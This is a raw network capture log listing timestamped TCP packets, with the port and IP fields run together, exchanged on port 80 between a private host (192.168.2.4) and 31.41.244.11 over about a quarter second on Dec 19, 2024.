                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403054953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403105974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403240919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403924942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403975010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403985023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404002905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404027939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404055119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404797077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404846907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404869080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404885054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404911041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.404926062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.405756950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.405774117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.405790091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.405802965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.405814886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.405833006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.406622887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.406639099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.406655073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.406672001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.406685114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.406702995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.407465935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.407532930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.407556057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.407572031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.407598972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.407610893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.408413887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.408720016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.408737898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.408754110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.408781052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.408817053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.409569979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.409585953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.409601927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.409636974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.409648895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.410500050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.410516024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.410532951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.410567045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.410589933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.411375046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.411391020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.411406040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.411425114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.411437035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.411457062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.412350893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.412367105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.412384033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.412414074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.412434101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.413268089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.413295031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.413311005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.413343906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.413368940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414005995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414052963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414053917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414069891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414103031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414113998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414887905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414913893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414931059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414961100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.414979935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.415755987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.415824890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.415842056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.415880919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.415910006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.416708946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.416724920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.416739941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.416785002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.416820049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.417601109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.417679071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.417695999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.417727947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.417754889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.418415070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.418566942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.428811073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.428879976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.428896904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.428937912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.428972006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.429270029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.429297924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.429312944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.429346085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.429375887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.430159092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.430793047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.581722975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.581739902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.581762075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.581806898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.581830025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582077980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582094908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582109928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582144976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582144976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582940102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582947016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582989931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.582992077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583014965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583034992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583060026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583861113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583878040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583900928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583924055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.583949089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.584762096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.584778070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.584793091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.584824085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.584824085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.585618973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.585670948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.585675001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.585699081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.585747004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.586508989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.586524963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.586539984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.586554050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.586579084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.587380886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.587415934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.587436914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.587469101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.587485075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.588268042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.588295937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.588313103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.588340998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.588362932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.589179993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.589195967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.589211941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.589241028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.589261055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590078115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590094090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590110064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590123892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590136051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590162992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590941906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590991020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.590992928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591011047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591033936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591047049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591811895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591869116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591883898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591913939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.591933012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.592762947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.592781067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.592823029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.592828035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.593594074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.593638897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.593641043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.593660116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.593682051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.593704939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.594491005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.594536066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.594546080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.594562054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.594589949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.594600916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.595446110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.595460892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.595477104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.595504999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.595530033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.599987984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600003958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600061893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600152016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600168943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600191116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600208044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600217104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600224972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600239038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600240946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600259066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600265026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600265026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600284100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600291014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600667953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600684881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600701094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600713015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.600735903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.601603985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.601624012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.601639986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.601666927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.601680994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602519989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602566957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602845907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602865934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602883101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602889061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602904081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.602916956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.603786945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.603804111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.603832006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.603843927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.603982925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604028940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604607105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604634047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604645014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604651928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604671001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.604688883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.605493069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.605515957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.605531931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.605540991 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.605560064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.605565071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.606515884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.606534004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.606549978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.606576920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.606602907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.607351065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.607371092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.607387066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.607413054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.607438087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.608176947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.608211040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.608226061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.608253956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.608272076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.609045982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.609065056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.609081030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.609110117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.609128952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610059977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610076904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610091925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610119104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610138893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610899925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610914946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610929966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610955954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.610976934 CET4986080192.168.2.431.41.244.11
